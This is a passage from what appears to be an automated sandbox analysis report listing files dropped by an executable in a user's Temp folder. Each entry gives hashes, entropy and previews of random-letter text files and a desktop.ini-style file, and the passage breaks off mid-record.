                                                                                                                                                                                                                                Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\jqnnpe.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\jqnnpe.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.687722658485212
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                                                                                                MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                                                                                                SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                                                                                                SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                                                                                                SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\jqnnpe.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.690394987545919
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
                                                                                                                                                                                                                                MD5:CA901F8E74EB7955CF06A00BD424C0C2
                                                                                                                                                                                                                                SHA1:0876F92A018E8AB57F666FBB048B1CD028607A38
                                                                                                                                                                                                                                SHA-256:6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
                                                                                                                                                                                                                                SHA-512:7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\jqnnpe.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.696250160603532
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                                                                                                                                                                                MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                                                                                                                                                                                SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                                                                                                                                                                                SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                                                                                                                                                                                SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\jqnnpe.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\jqnnpe.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\jqnnpe.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\jqnnpe.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\jqnnpe.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):282
                                                                                                                                                                                                                                Entropy (8bit):3.514693737970008
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlWygDAlLwkAl2FlRaQmZWGokJISlfY:QZsiL5wmHOlDmo0qmWvclLwr2FlDmo0I
                                                                                                                                                                                                                                MD5:9E36CC3537EE9EE1E3B10FA4E761045B
                                                                                                                                                                                                                                SHA1:7726F55012E1E26CC762C9982E7C6C54CA7BB303
                                                                                                                                                                                                                                SHA-256:4B9D687AC625690FD026ED4B236DAD1CAC90EF69E7AD256CC42766A065B50026
                                                                                                                                                                                                                                SHA-512:5F92493C533D3ADD10B4CE2A364624817EBD10E32DAA45EE16593E913073602DB5E339430A3F7D2C44ABF250E96CA4E679F1F09F8CA807D58A47CF3D5C9C3790
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.3.....
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\jqnnpe.exe
                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):657
                                                                                                                                                                                                                                Entropy (8bit):4.156799182956013
                                                                                                                                                                                                                                Encrypted:false
